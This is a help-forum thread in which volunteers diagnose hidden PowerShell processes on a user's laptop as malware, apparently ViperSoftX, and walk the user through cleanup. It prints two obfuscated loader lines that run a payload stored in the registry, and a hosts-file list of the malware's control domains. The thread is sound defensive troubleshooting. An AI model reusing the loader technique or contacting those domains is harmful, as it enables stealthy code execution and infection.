Windows Powershell Suddenly pops and uses too much RAM. How do I resolve this?

Sughosh S V 40

I'm Using an HP Victus Laptop. I have attached a screenshot of the device model and its information.

Probleme : The Windows powershell sudennly pops up out of nowhere and it runs as a background process.To close it I have to use taskmanager to end the task and it consumes too much RAM while it is running (almost 96% RAM will be in use when it is running and drops by time). I've also attached the screenshot of the taskmanager , (You can see the description of the Comnand Line which says Windows Style Hidden) . Most of the time it opens 2 seperate instances of Powershell, but some times only 1 instance will pop up.

Can you help me with this issue? Screenshot 2023-08-21 185253

Screenshot 2023-08-21 184752

Screenshot (80)

Rich Matheisen 45,111

You can see the command line of each PowerShell process. While they're running, make a copy of the script files (assuming they weren't deleted by the running process) and examine them.

If there's a scheduled task that's starting them, try something like this to help locate them/it:

Get-ScheduledTask |
    ForEach-Object{
         if ($_.Actions.Execute -like "*PowerShell*" -OR 
             $_.Actions.Execute -like "*Pwsh*" -OR 
             $_.Actions.Execute -like "*cmd.exe" -OR
             $_.Actions.Execute -like "*.bat" -OR
             $_.Actions.Execute -like "*.cmd"){
                [PSCustomObject]@{
                    TaskName = $_.TaskName
                    TaskPath = $_.TaskPath
                    Execute  = $_.Actions.Execute}
        }
    }

Sughosh S V 40 Reputation points

2023-08-26T07:31:54.0033333+00:00

Can u eloborate on what I have to do? I didn't understand it properly...
Sughosh S V 40 Reputation points

2023-08-26T07:36:18.65+00:00

This is what I got after executing the code u provided
Rich Matheisen 45,111 Reputation points

2023-08-26T15:15:57.55+00:00

None of those scheduled tasks look overly suspicious just looking at their names. However, on a Windows 11 machine there's no scheculed task named "CreateObjectTaskW1b1Nc" (there's one named "CreateObjectTask"), or "WiFiTask5pGHvZjjf" (there's one named "WiFiTask").

Have you been able to save a copy of the file noted in the command line of the process running PowerShell that's using 2.2GB of memory and high power usage?
Sughosh S V 40 Reputation points

2023-08-27T13:21:55.8033333+00:00

Have you been able to save a copy of the file noted in the command line of the process running PowerShell that's using 2.2GB of memory and high power usage? --> how do I do this?

And about the scheduled task which u mentioned does not exist, what should i do about is? Is there a chance of any malware?
MotoX80 32,246 Reputation points

2023-08-27T14:04:25.4433333+00:00

Run notepad. Do a "file open" and navigate to the C:\windows\system32 folder and also the A732.tmp subfolder. In the file name field put "*.ps1". Open those files. Do you see any words that look like they are related to any software that you have installed?

Malware is certainly a possibility. You should run a full Defender scan.
Sughosh S V 40 Reputation points

2023-08-28T04:13:19.37+00:00

In C:\windows\system32 -> I found a file named 747D9CF3-170B-4097-A847-D75876F01A8C.ps1 which had this :

--> $ptIbTKzfMQmx=[ScriptBlock];$hhuJltusjXvpf=[string];$PYuOCJsRJFMr=[char]; icm ($ptIbTKzfMQmx::Create($hhuJltusjXvpf::Join('', ((gp 'HKLM:\SOFTWARE\ClassesSNupol2').'jOlV24T860' | % { [char]$_ }))))

In A732.tmp folder, I found a file A733.tmp.ps1 --> $wzfaDSzGjFw=[ScriptBlock]; icm ($wzfaDSzGjFw::Create([string]::Join('', ((gp (([regex]::Matches('OlFYmrmEketlaeR\ERAWTFOS:MLKH','.','RightToLeft') | ForEach {$.value}) -join '')).'o33ua6Qj4Yx' | % { [char]$ }))))

I don't find any software name in this, that I have installed

Accepted answer

Rich Matheisen 45,111 Reputation points

2023-08-28T18:42:35.1+00:00

For the file 747D9CF3-170B-4097-A847-D75876F01A8C.ps1 -- it's loading the contents of the item jOlV24T860 in the registry key HKLM:\SOFTWARE\ClassesSNupol2 into a script block and then using Invoke-Command to run that script block.

For the file A733.tmp.ps1 -- it's loading the contents of the item o33ua6Qj4Yx in the registry key HKLM:\SOFTWARE\RealtekEmrmYFlO into a script block, and the using Invoke-Command to run that script block.

So . . . what's in those registry items???

Keep in mind that the registry key and item names may vary from execution to execution. However, I don't think I've ever seen a HKLM:\SOFTWARE\ClassesSNupol2 registry key before (or one like it). There surely is a HKLM:\SOFTWARE\Classes, though.

That all looks might strange to me.
Please sign in to rate this answer.
Sughosh S V 40 Reputation points

2023-08-29T02:08:20.22+00:00

Inside both of these folders I have REG_BINARY file which contain some value also I have a REG_SZ Default file whose value is not set.

How can I share these files? I tried copying it's conntent but it didn't worked.

Rich Matheisen 45,111 Reputation points

2023-08-29T03:09:06.6+00:00

Select the registry key, right-click and choose 'Export'. Save the file and change the extension from .reg to .txt.

You can either upload the txt file as an attachment, or open it in Notepad, copy the contents and paste it into a comment. If the editor doesn't recognize that as code, select what you pasted and, while it's still highlighted, and click the "code" icon (8th from the left -- it's the one with "<>" in white on a black background.

Just from the little bit that's visible, it looks like the code in both those items is doing some sort of I/O operations.

Sughosh S V 40 Reputation points

2023-08-29T03:40:07.14+00:00

I've uploaded the .txt files in my drive. Named it as RealtecEmrnYFIO.txt and ClassesSNupol2.txt

--> https://drive.google.com/drive/folders/1Yi70c25VlDndt5fDT8kges5-64RJv15v?usp=sharing

would this work?
Sign in to comment

2 additional answers

MotoX80 32,246 Reputation points

2023-08-28T13:05:43.0433333+00:00

I don't find any software name in this, that I have installed

That certainly looks suspicious. The one registry key is in right to left string order and is looking at HKLM:\Software\RealtekEmrmYFLO

How you downloaded/installed any Realtec software or audio codec's? Really, have you installed anything recently?

Start by installing and running Microsoft's MRT tool.

https://www.microsoft.com/en-us/download/details.aspx?id=9905

Then run Windows Update and make sure that you have the latest Security Intelligence Update for Defender installed. Then run a full Defender scan. If nothing is found, then run the offline scan.

https://support.microsoft.com/en-us/windows/help-protect-my-pc-with-microsoft-defender-offline-9306d528-64bf-4668-5b80-ff533f183d6c

In addition to the scheduled tasks that Rich pointed out, there are other methods to launch a program. You can use autoruns to search all locations. There is a checkbox next to each entry that you can use to temporarily disable it.

https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns

If those files are not flagged as malware, then rename them from .ps1 to .txt files. That way they won't execute. Pick one and attach it to this question using the "File" icon. We can take a look at the code and see what it is doing.
Please sign in to rate this answer.
Sughosh S V 40 Reputation points

2023-08-28T13:53:17.18+00:00

I don't remember installing anything related to Realtec software.

I ran the autorun software and I have attached the screenshot below. It shows as verified in Publisher.But when i did check with VirusTotal it detected as a Malware(added screenshot). It is usual or just for me?

By this time I'm still runnig the MRT and I'll update it later.

MotoX80 32,246 Reputation points

2023-08-28T16:11:44.0566667+00:00

I'm not sure what that VirusTotal image is telling me. The malware would not necessarily be Powershell.exe itself, but the .ps1 script file. What did you scan?

Are there any other files in that A732.tmp folder?

Can you save one of those .ps1 files as a .txt file and upload it so that I can look at the code?

Deleted

This comment has been deleted due to a violation of our Code of Conduct. The comment was manually reported or identified through automated detection before action was taken. Please refer to our Code of Conduct for more information.

Sughosh S V 40 Reputation points

2023-08-28T16:41:20.9533333+00:00

747D9CF3-170B-4097-A847-D75876F01A8C.txt

This was a .ps1 file present in C:/windows/system32 folder

Sughosh S V 40 Reputation points

2023-08-28T16:44:55.3066667+00:00

A733.tmp.txt

The scan is still going on since I chose Full scan and till now it hasn't found any infected file.

This was the only .ps1 file present in that A732.tmp folder (attached with this comment)

MotoX80 32,246 Reputation points

2023-08-28T17:46:09.8166667+00:00

Thanks, I'll take a look at these later today.

MotoX80 32,246 Reputation points

2023-08-28T21:01:04.5133333+00:00

I get an error when I try to download those files.

This is a test.

AdminTest.txt

AdminTestZip.txt

MotoX80 32,246 Reputation points

2023-08-28T21:17:41.6433333+00:00

Try this: add those .txt files to a .zip (archive) file. Then rename that file from .zip to .txt. Then upload that. See if that works.

Sughosh S V 40 Reputation points

2023-08-29T01:58:10.9533333+00:00

I tried this, It was working fine, late gave some error after 10mibutes of posting that comment.

I added a drive link in this, plese check this, The files uploadded at 7:22 AM

-> https://drive.google.com/drive/folders/1Yi70c25VlDndt5fDT8kges5-64RJv15v?usp=sharing

I've also added the contents of the file in my previous comment, on Aug 28, 2023, 9:43 AM, Check this.

In MRT Scan It didn't find any infected files.
Sign in to comment
MotoX80 32,246 Reputation points

2023-08-29T13:15:07.35+00:00

It looks like you are infected with something called privatproxy-schnellvpn.xyz.

https://www.bing.com/search?q=privatproxy-schnellvpn.xyz

Did Defender or MRT find anything? If not, I would suggest installing MalwareBytes and having it scan your PC.

Are you on a corporate or home network? If corporate, report this to your network/security team. If you are on a home network and MalwareBytes detects the malware, then install that on all of your home pc's.

It's downloading data via DNS. Thats a technique that the Russian FSB has used.

It's using these hostnames.
Please sign in to rate this answer.
Deleted

This comment has been deleted due to a violation of our Code of Conduct. The comment was manually reported or identified through automated detection before action was taken. Please refer to our Code of Conduct for more information.

Sughosh S V 40 Reputation points

2023-08-29T14:24:03.5633333+00:00

The MRT scan didn't find anything, I'm doing microsoft defender scan now. How did u came to know that it's ViperSoftX (Just asking out of curiosity)? The screenshot u provided were the contents of the Registry File?

Is there a way to find out when this got installed, and from which software? or any other information

MotoX80 32,246 Reputation points

2023-08-29T14:53:50.5333333+00:00

I picked one of those hostnames and did a search. That's the link to the Bing search. But I suspected that there was more to it than that, so I did some more searches. I wanted to find the CVE number. That's where I found that comment from the security researcher. It looks like the moderators have removed my comment.

There might be multiple names/variations that this malware is known by.

I was going to try to download the code from the DNS servers just to see what it did, but I decided not to pursue that.

You can see the download code that's on your pc by running this PS statement.

-join ((Get-ItemProperty "HKLM:\SOFTWARE\ClassesSNupol2").jOlV24T860 | foreach {[char]$_})

If none of your AV tools detects that malware, delete those scheduled tasks, delete the .ps1 files, and delete the registry entries.

You would next need to figure out how it got loaded on your PC. I've seen some comments about Chrome extensions so you should review anything that you have loaded into Edge and Chrome.

MotoX80 32,246 Reputation points

2023-08-29T15:05:26.21+00:00

See if Malwarebytes detects anything.

https://www.malwarebytes.com/

Sughosh S V 40 Reputation points

2023-08-29T15:10:02.0566667+00:00

yes Malware did detected a lot and quarentined it, So what should I do now? In the registry those two files still exists.

I'm using a crack version of IDM, and few Adobe softwares, from Getintopc, I have an IDM Extension in my Chrome.

Just now came across a registry folder inside chrome, looked kind of weired, can u just check it ? (added screenshot)

This is the link of the Extension --> https://chrome.google.com/webstore/detail/idm-integration-module/ngpampappnmepgilojfohadhhmbhlaek

Rich Matheisen 45,111 Reputation points

2023-08-29T15:31:46.86+00:00

This probably won't help for very long, but add this to your C:\Windows\System32\drivers\etc\hosts file (use Notepad and start it with "Run as administrator). Note that it has no file suffix -- so don't add one! This may stop the thing from downloading any more updates.

127.0.0.1 wmail-endpoint.com 127.0.0.1 wmail-blog.com 127.0.0.1 wmail-chat.com 127.0.0.1 wmail-cdn.com 127.0.0.1 wmail-schnellvpn.com 127.0.0.1 fairu-endpoint.com 127.0.0.1 fairu-blog.com 127.0.0.1 fairu-chat.com 127.0.0.1 fairu-cdn.com 127.0.0.1 fairu-schnellvpn.com 127.0.0.1 bideo-endpoint.com 127.0.0.1 bideo-blog.com 127.0.0.1 bideo-chat.com 127.0.0.1 bideo-cdn.com 127.0.0.1 bideo-schnellvpn.com 127.0.0.1 privatproxy-endpoint.com 127.0.0.1 privatproxy-blog.com 127.0.0.1 privatproxy-chat.com 127.0.0.1 privatproxy-cdn.com 127.0.0.1 privatproxy-schnellvpn.com 127.0.0.1 ahoravideo-endpoint.com 127.0.0.1 ahoravideo-blog.com 127.0.0.1 ahoravideo-chat.com 127.0.0.1 ahoravideo-cdn.com 127.0.0.1 ahoravideo-schnellvpn.com 127.0.0.1 wmail-endpoint.xyz 127.0.0.1 wmail-blog.xyz 127.0.0.1 wmail-chat.xyz 127.0.0.1 wmail-cdn.xyz 127.0.0.1 wmail-schnellvpn.xyz 127.0.0.1 fairu-endpoint.xyz 127.0.0.1 fairu-blog.xyz 127.0.0.1 fairu-chat.xyz 127.0.0.1 fairu-cdn.xyz 127.0.0.1 fairu-schnellvpn.xyz 127.0.0.1 bideo-endpoint.xyz 127.0.0.1 bideo-blog.xyz 127.0.0.1 bideo-chat.xyz 127.0.0.1 bideo-cdn.xyz 127.0.0.1 bideo-schnellvpn.xyz 127.0.0.1 privatproxy-endpoint.xyz 127.0.0.1 privatproxy-blog.xyz 127.0.0.1 privatproxy-chat.xyz 127.0.0.1 privatproxy-cdn.xyz 127.0.0.1 privatproxy-schnellvpn.xyz 127.0.0.1 ahoravideo-endpoint.xyz 127.0.0.1 ahoravideo-blog.xyz 127.0.0.1 ahoravideo-chat.xyz 127.0.0.1 ahoravideo-cdn.xyz 127.0.0.1 ahoravideo-schnellvpn.xyz

Edit: The original text had the columns reversed.

Sughosh S V 40 Reputation points

2023-08-29T15:48:55+00:00

What should be the name of the txt document? and there is nothing like hosts inside that folder? and if posiible how does this text document work and what does it do (I just want to understand and learn)?

Should I delete thpse .ps1 files?

MotoX80 32,246 Reputation points

2023-08-29T15:54:48.2333333+00:00

The name looks strange, but the registry values look like normal file paths and a version number.

If you're running a cracked version of software, you're kind of vulnerable to whatever else might be in there. I'd get rid of that.

I would only use approved/scanned software and extensions from the MS and Google stores. I do use freeware like Notepad++, LibreOffice, and Agent Ransack, but I've used those for years.

I do have VMWare Player installed, and I've built a test VM that I use to play with any questionable software. That way I don't expose my main PC and all my personal info to something that might be malicious. If the VM gets infected, I just build a new one.

MotoX80 32,246 Reputation points

2023-08-29T16:00:04.6033333+00:00

Delete those .ps1 files and registry keys.

Sughosh S V 40 Reputation points

2023-08-29T16:06:52.72+00:00

The Entire folder of ClassSNupol2 and RealtekEmrmYFIO? or just the registry file inside it?

Sughosh S V 40 Reputation points

2023-08-29T16:16:54.6266667+00:00

Entire folder or just the REG_BINARY files?

MotoX80 32,246 Reputation points

2023-08-29T16:27:56.07+00:00

Delete the reg_binary and then modify the permissions on ClassSNupol2 and RealtekEmrmYFIO and remove update access for all accounts. If you get re-infected, that might stop it. It might also just pick different folder names, you never know. You just have to be careful about what software you install on your pc.

Rich Matheisen 45,111 Reputation points

2023-08-29T18:52:46.26+00:00

FIRST: Discard my earlier file! I had the IP address and host names reversed!!

I corrected my earlier post with the correct contents.

If you're using Notepad, my guess is that you're only looking for files of this type when you try to open a file: *.txt* -- if so, change that to "All files (*.*)"

The file is a standard delivery on every Windows system going all the way back to Windows 1.0!

C:\Windows\System32>dir C:\Windows\System32\drivers\etc\hosts Volume in drive C is Local Disk Volume Serial Number is 9CA7-0D6F Directory of C:\Windows\System32\drivers\etc 04/25/2021 10:12 PM 931 hosts 1 File(s) 931 bytes 0 Dir(s) 300,548,448,256 bytes free

The hosts file is part of the DNS Client services lookup process. The DNS client looks in that file first, then in DNS. What those entries are doing is telling the DNS Client that the IP addresses on the left are the ones to use when resolving the names on the right.

The effect, unless you're running a web server on your machine, is to cause the connection to fail.

Sughosh S V 40 Reputation points

2023-08-30T03:25:06.0266667+00:00

for all of those different domain names like privateproxy.... why do i have same IP address(thats the localhost right?)?

how does this help for me? what does it actually do?

Rich Matheisen 45,111 Reputation points

2023-08-30T18:57:11.84+00:00

It prevents your machine from accessing those web sites. Those sites are the source of both the initial infection and the subsequent updates that the code you posted is constantly looking for.

Sughosh S V 40 Reputation points

2023-08-31T02:56:16.9366667+00:00

okay thanks for the support helped a lot :) 🙏
Sign in to comment

Share via

Windows Powershell Suddenly pops and uses too much RAM. How do I resolve this?

2 additional answers